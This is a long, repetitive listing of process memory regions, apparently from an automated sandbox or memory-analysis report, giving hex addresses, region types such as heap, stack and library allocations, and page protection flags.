|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
5864000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
292000
|
heap
|
page read and write
|
||
|
1C37C000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
92B1000
|
trusted library allocation
|
page read and write
|
||
|
5713000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
59DD000
|
heap
|
page read and write
|
||
|
6AB1000
|
trusted library allocation
|
page read and write
|
||
|
28E000
|
heap
|
page read and write
|
||
|
1F50000
|
direct allocation
|
page read and write
|
||
|
56C6000
|
heap
|
page read and write
|
||
|
2DB0000
|
trusted library allocation
|
page read and write
|
||
|
36C000
|
heap
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
7FE89AB4000
|
trusted library allocation
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
39DB000
|
heap
|
page read and write
|
||
|
1FA0000
|
direct allocation
|
page read and write
|
||
|
208000
|
heap
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
7FE89AB8000
|
trusted library allocation
|
page read and write
|
||
|
59D6000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
C4000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
1C367000
|
heap
|
page read and write
|
||
|
3A00000
|
trusted library allocation
|
page read and write
|
||
|
396B000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
12321000
|
trusted library allocation
|
page read and write
|
||
|
45FE000
|
heap
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
3D2000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
4A8000
|
heap
|
page read and write
|
||
|
3AFA000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
1ECF000
|
stack
|
page read and write
|
||
|
7FE89C2D000
|
trusted library allocation
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
36DA000
|
stack
|
page read and write
|
||
|
3F7E000
|
stack
|
page read and write
|
||
|
122FF000
|
trusted library allocation
|
page read and write
|
||
|
39F0000
|
trusted library allocation
|
page read and write
|
||
|
46E000
|
heap
|
page read and write
|
||
|
3CDE000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
37E0000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
39F0000
|
trusted library allocation
|
page read and write
|
||
|
27D5000
|
trusted library allocation
|
page read and write
|
||
|
541F000
|
heap
|
page read and write
|
||
|
27D3000
|
trusted library allocation
|
page read and write
|
||
|
1D30000
|
trusted library allocation
|
page read and write
|
||
|
7FE89966000
|
trusted library allocation
|
page read and write
|
||
|
3911000
|
heap
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
546000
|
heap
|
page read and write
|
||
|
49C1000
|
heap
|
page read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
1A782000
|
heap
|
page read and write
|
||
|
44C7000
|
heap
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
B50000
|
direct allocation
|
page execute and read and write
|
||
|
1B0BF000
|
stack
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
49C7000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
381000
|
heap
|
page read and write
|
||
|
5AD000
|
heap
|
page read and write
|
||
|
246000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
473F000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
E4000
|
heap
|
page read and write
|
||
|
7EB1000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
direct allocation
|
page read and write
|
||
|
3A60000
|
trusted library allocation
|
page read and write
|
||
|
45E3000
|
heap
|
page read and write
|
||
|
3CC8000
|
heap
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
59DE000
|
heap
|
page read and write
|
||
|
1C310000
|
heap
|
page read and write
|
||
|
30BC000
|
stack
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
3C92000
|
heap
|
page read and write
|
||
|
1CB5000
|
heap
|
page read and write
|
||
|
2BD4000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
7FE89A92000
|
trusted library allocation
|
page read and write
|
||
|
3970000
|
heap
|
page read and write
|
||
|
1DE000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
2AAC000
|
stack
|
page read and write
|
||
|
369000
|
heap
|
page read and write
|
||
|
7FE89930000
|
trusted library allocation
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
2CE000
|
heap
|
page read and write
|
||
|
233000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
1B269000
|
heap
|
page read and write
|
||
|
3CC9000
|
heap
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
direct allocation
|
page execute and read and write
|
||
|
1B0F6000
|
heap
|
page read and write
|
||
|
46A000
|
heap
|
page read and write
|
||
|
3CCF000
|
heap
|
page read and write
|
||
|
4994000
|
heap
|
page read and write
|
||
|
585000
|
heap
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
49BB000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
49B9000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
47E3000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
395D000
|
heap
|
page read and write
|
||
|
1B24C000
|
stack
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
49C7000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
1ADC6000
|
heap
|
page read and write
|
||
|
1A4B4000
|
heap
|
page execute and read and write
|
||
|
362000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
1CB0000
|
heap
|
page read and write
|
||
|
491000
|
heap
|
page read and write
|
||
|
24AD000
|
trusted library allocation
|
page read and write
|
||
|
3657000
|
trusted library allocation
|
page read and write
|
||
|
20A000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
3C97000
|
heap
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
15B000
|
stack
|
page read and write
|
||
|
385D000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DEE000
|
stack
|
page read and write | page guard
|
||
|
1C212000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
27D7000
|
trusted library allocation
|
page read and write
|
||
|
4796000
|
heap
|
page read and write
|
||
|
2480000
|
heap
|
page read and write
|
||
|
3852000
|
heap
|
page read and write
|
||
|
36C000
|
heap
|
page read and write
|
||
|
599F000
|
heap
|
page read and write
|
||
|
7FE89A6C000
|
trusted library allocation
|
page read and write
|
||
|
47EA000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
2CDC000
|
stack
|
page read and write
|
||
|
3CCA000
|
heap
|
page read and write
|
||
|
58C0000
|
heap
|
page read and write
|
||
|
39E0000
|
heap
|
page read and write
|
||
|
3962000
|
heap
|
page read and write
|
||
|
4265000
|
heap
|
page read and write
|
||
|
2191000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
3910000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
578E000
|
heap
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
59D8000
|
heap
|
page read and write
|
||
|
58F8000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
39D9000
|
heap
|
page read and write
|
||
|
5714000
|
heap
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
45F6000
|
heap
|
page read and write
|
||
|
1E6C000
|
stack
|
page read and write
|
||
|
452F000
|
heap
|
page read and write
|
||
|
36C000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
|
47EC000
|
heap
|
page read and write
|
||
|
3CA000
|
direct allocation
|
page read and write
|
||
|
234F000
|
stack
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
7FE898C0000
|
trusted library allocation
|
page read and write
|
||
|
1C221000
|
heap
|
page read and write
|
||
|
2E8000
|
stack
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
27C0000
|
remote allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
3CDC000
|
heap
|
page read and write
|
||
|
37F4000
|
heap
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
4603000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
3760000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
7FE89966000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A11000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
7FE89A64000
|
trusted library allocation
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
401000
|
heap
|
page read and write
|
||
|
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
49BE000
|
heap
|
page read and write
|
||
|
5A0D000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
|
1D20000
|
heap
|
page read and write
|
||
|
24B1000
|
trusted library allocation
|
page read and write
|
||
|
3CD7000
|
heap
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
3D07000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1C430000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
4D6000
|
heap
|
page read and write
|
||
|
3E2000
|
heap
|
page read and write
|
||
|
29D000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
5412000
|
heap
|
page read and write
|
||
|
12301000
|
trusted library allocation
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
4C3000
|
direct allocation
|
page read and write
|
||
|
7FE8993C000
|
trusted library allocation
|
page execute and read and write
|
||
|
58B5000
|
heap
|
page read and write
|
||
|
1C36D000
|
heap
|
page read and write
|
||
|
22F1000
|
trusted library allocation
|
page read and write
|
||
|
27D9000
|
trusted library allocation
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5857000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
3528000
|
trusted library allocation
|
page read and write
|
||
|
1B30E000
|
stack
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
7FE8988D000
|
trusted library allocation
|
page execute and read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
24A0000
|
trusted library allocation
|
page read and write
|
||
|
28F8000
|
trusted library allocation
|
page read and write
|
||
|
1AB44000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
4496000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
47E8000
|
heap
|
page read and write
|
||
|
27D7000
|
trusted library allocation
|
page read and write
|
||
|
3CD4000
|
heap
|
page read and write
|
||
|
49C7000
|
heap
|
page read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
1C26000
|
heap
|
page read and write
|
||
|
5734000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
28EF000
|
stack
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
5514000
|
heap
|
page read and write
|
||
|
5810000
|
heap
|
page read and write
|
||
|
59DD000
|
heap
|
page read and write
|
||
|
3AB000
|
direct allocation
|
page read and write
|
||
|
3709000
|
trusted library allocation
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
212000
|
unkown
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
4774000
|
heap
|
page read and write
|
||
|
424000
|
heap
|
page read and write
|
||
|
398F000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
1C14F000
|
stack
|
page read and write
|
||
|
3CDE000
|
heap
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
256000
|
heap
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
3720000
|
heap
|
page read and write
|
||
|
390000
|
direct allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
49FB000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
3A60000
|
trusted library allocation
|
page read and write
|
||
|
541A000
|
heap
|
page read and write
|
||
|
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
|
56A2000
|
heap
|
page read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
4CB1000
|
trusted library allocation
|
page read and write
|
||
|
36B000
|
heap
|
page read and write
|
||
|
1C483000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
587A000
|
heap
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
1B67B000
|
stack
|
page read and write
|
||
|
49C1000
|
heap
|
page read and write
|
||
|
CD7000
|
direct allocation
|
page execute and read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
3E1E000
|
stack
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
1BF0000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
156000
|
stack
|
page read and write
|
||
|
1B310000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
20C1000
|
trusted library allocation
|
page read and write
|
||
|
5F1000
|
heap
|
page read and write
|
||
|
49FB000
|
heap
|
page read and write
|
||
|
1D80000
|
heap
|
page read and write
|
||
|
176000
|
stack
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
3B0000
|
direct allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
354A000
|
trusted library allocation
|
page read and write
|
||
|
56C1000
|
heap
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
26A0000
|
trusted library allocation
|
page execute read
|
||
|
54E000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
4796000
|
heap
|
page read and write
|
||
|
5A0D000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
27DF000
|
trusted library allocation
|
page read and write
|
||
|
1ACEF000
|
stack
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
498F000
|
heap
|
page read and write
|
||
|
39D7000
|
heap
|
page read and write
|
||
|
3884000
|
heap
|
page read and write
|
||
|
57BE000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
2E3000
|
heap
|
page read and write
|
||
|
3989000
|
heap
|
page read and write
|
||
|
1D90000
|
direct allocation
|
page read and write
|
||
|
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
direct allocation
|
page execute and read and write
|
||
|
393000
|
direct allocation
|
page read and write
|
||
|
45F2000
|
heap
|
page read and write
|
||
|
5B1000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
3986000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
3650000
|
heap
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
39DD000
|
heap
|
page read and write
|
||
|
1C55D000
|
stack
|
page read and write
|
||
|
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
|
3CBF000
|
stack
|
page read and write
|
||
|
1C457000
|
heap
|
page read and write
|
||
|
20AE000
|
stack
|
page read and write | page guard
|
||
|
49C1000
|
heap
|
page read and write
|
||
|
3F9000
|
heap
|
page read and write
|
||
|
3686000
|
heap
|
page read and write
|
||
|
1C448000
|
heap
|
page read and write
|
||
|
142000
|
stack
|
page read and write
|
||
|
3989000
|
heap
|
page read and write
|
||
|
3B0F000
|
stack
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
20BE000
|
stack
|
page read and write | page guard
|
||
|
12466000
|
trusted library allocation
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
460B000
|
stack
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
3972000
|
heap
|
page read and write
|
||
|
59D0000
|
heap
|
page read and write
|
||
|
4411000
|
heap
|
page read and write
|
||
|
330000
|
direct allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
4DF000
|
heap
|
page read and write
|
||
|
259F000
|
stack
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
3909000
|
heap
|
page read and write
|
||
|
49C7000
|
heap
|
page read and write
|
||
|
1C6B0000
|
heap
|
page read and write
|
||
|
1C44C000
|
heap
|
page read and write
|
||
|
7FE898BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
570D000
|
heap
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
2420000
|
trusted library allocation
|
page execute read
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
59C3000
|
heap
|
page read and write
|
||
|
5846000
|
heap
|
page read and write
|
||
|
1AA19000
|
stack
|
page read and write
|
||
|
1B01B000
|
stack
|
page read and write
|
||
|
394B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1A969000
|
stack
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
4DF000
|
direct allocation
|
page read and write
|
||
|
256F000
|
trusted library allocation
|
page read and write
|
||
|
312C000
|
trusted library allocation
|
page read and write
|
||
|
244000
|
heap
|
page read and write
|
||
|
5A0D000
|
heap
|
page read and write
|
||
|
53A0000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
44B0000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
1ABCE000
|
heap
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
3C92000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
3C57000
|
heap
|
page read and write
|
||
|
CD1000
|
direct allocation
|
page execute and read and write
|
||
|
3971000
|
heap
|
page read and write
|
||
|
3D0000
|
direct allocation
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
5886000
|
heap
|
page read and write
|
||
|
1D84000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3D7000
|
heap
|
page read and write
|
||
|
1AB70000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
49FE000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
1FF000
|
heap
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
5783000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
44C6000
|
heap
|
page read and write
|
||
|
56BA000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
591000
|
heap
|
page read and write
|
||
|
30C000
|
heap
|
page read and write
|
||
|
20BF000
|
stack
|
page read and write
|
||
|
1AC9C000
|
stack
|
page read and write
|
||
|
2581000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B75000
|
trusted library allocation
|
page read and write
|
||
|
12468000
|
trusted library allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
3984000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
3970000
|
heap
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
|
1C7AA000
|
stack
|
page read and write
|
||
|
3115000
|
trusted library allocation
|
page read and write
|
||
|
3C50000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
56F5000
|
heap
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
398F000
|
heap
|
page read and write
|
||
|
6B81000
|
trusted library allocation
|
page read and write
|
||
|
1F70000
|
direct allocation
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
7FE899D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
383B000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
1AD90000
|
heap
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
|
3977000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
38F0000
|
heap
|
page read and write
|
||
|
3CCB000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
390F000
|
heap
|
page read and write
|
||
|
5A0F000
|
heap
|
page read and write
|
||
|
59D8000
|
heap
|
page read and write
|
||
|
36C000
|
heap
|
page read and write
|
||
|
45F4000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3710000
|
trusted library allocation
|
page read and write
|
||
|
37C6000
|
heap
|
page read and write
|
||
|
3AF000
|
direct allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
1C1F8000
|
heap
|
page read and write
|
||
|
4120000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
E0000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
3C97000
|
heap
|
page read and write
|
||
|
475F000
|
heap
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
592D000
|
heap
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
7FE89883000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC0000
|
direct allocation
|
page execute and read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
27D9000
|
trusted library allocation
|
page read and write
|
||
|
1B264000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
2120000
|
heap
|
page execute and read and write
|
||
|
5734000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
1B0C0000
|
heap
|
page read and write
|
||
|
57C9000
|
heap
|
page read and write
|
||
|
1C69E000
|
stack
|
page read and write
|
||
|
2E1000
|
heap
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
278D000
|
stack
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
7FE89C2A000
|
trusted library allocation
|
page read and write
|
||
|
2564000
|
trusted library allocation
|
page read and write
|
||
|
24F000
|
heap
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3985000
|
heap
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page read and write
|
||
|
3C92000
|
heap
|
page read and write
|
||
|
22EF000
|
stack
|
page read and write
|
||
|
1EB0000
|
heap
|
page execute and read and write
|
||
|
1B3EF000
|
stack
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
59DB000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
395F000
|
heap
|
page read and write
|
||
|
1AD88000
|
stack
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
1CEB000
|
heap
|
page read and write
|
||
|
5922000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
21B0000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
2AA0000
|
remote allocation
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
4F7000
|
heap
